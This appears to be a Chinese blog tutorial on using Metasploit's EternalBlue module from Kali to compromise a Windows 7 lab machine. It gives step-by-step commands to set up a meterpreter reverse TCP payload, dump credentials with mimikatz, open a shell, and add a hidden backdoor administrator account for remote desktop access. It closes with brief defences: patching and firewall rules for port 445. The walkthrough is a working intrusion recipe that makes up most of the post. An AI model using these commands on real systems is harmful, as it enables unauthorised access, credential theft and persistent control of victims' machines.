永恒之蓝 ms17_010_eternalblue

恶意代码会扫描开放共享端口的windows机器,无需用户任何
永恒之蓝是会扫描开放445端口文件共享端口的windows机器,无需用户任何操作,只要开机上网。
会感染windowsxp windows2000 windows2003 windowsvista mac os 系统等
1.实验环境:kali-linux windows7旗舰版
2.IP地址
kali:192.168.116.129
win7: 192.168.116.130
在这里插入图片描述
3.开始实验
在这里插入图片描述
进入msfconsole,利用windows/smb/ms17_010_eternalblue(永恒之蓝漏洞)
进行攻击靶机win7

4.使用永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalbule
在这里插入图片描述
5.设定靶机ip和操作机ip(主要是靶机ip,因为端口在这个漏洞模块里默认是445,不用再设置,本地监听端口4444也是如此)
设定靶机ip(win7):set rhost 192.168.116.130
设定操作机ip(kali):set lhost 192.168.116.129
在这里插入图片描述
6:设置TCP连接
set payload windows/x64/meterpreter/reverse_tcp
在这里插入图片描述
7.查看配置
show options在这里插入图片描述

查看是否设置成功
8.攻击
run 或者exploit

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
攻击成功 进入到meterpreter模块
9.获取win7用户密码
利用load mimikatz 调用获取系统用户密码
因为我这个已经加载过一次了,所以会报错

在这里插入图片描述
如果是第一次加载就会出现
在这里插入图片描述
然后利用kerberos模块 来获取win7靶机的系统用户密码

在这里插入图片描述
9.提权
shell
在这里插入图片描述

在这里插入图片描述
得到靶机权限
10.或者新建一个用户,偷偷的控制权限使用
net user liang 123456 /add (创建一个用户密码为admin 123456)
11.提权,将新建用户liang提权到管理员权限
net localgroup administrators liang /add
在这里插入图片描述

查看权限
net user liang
在这里插入图片描述
12,远程连接靶机桌面

在这里插入图片描述

在这里插入图片描述
直接用自己所创建的用户远程连接进入系统。
渗透测试成功
主要攻击 win7,server2008 之类的机器
防御办法:
1,网上下载补丁,
2,关闭445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
检测445端口是否开启:
netstat -ano -p tcp | find “445”

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值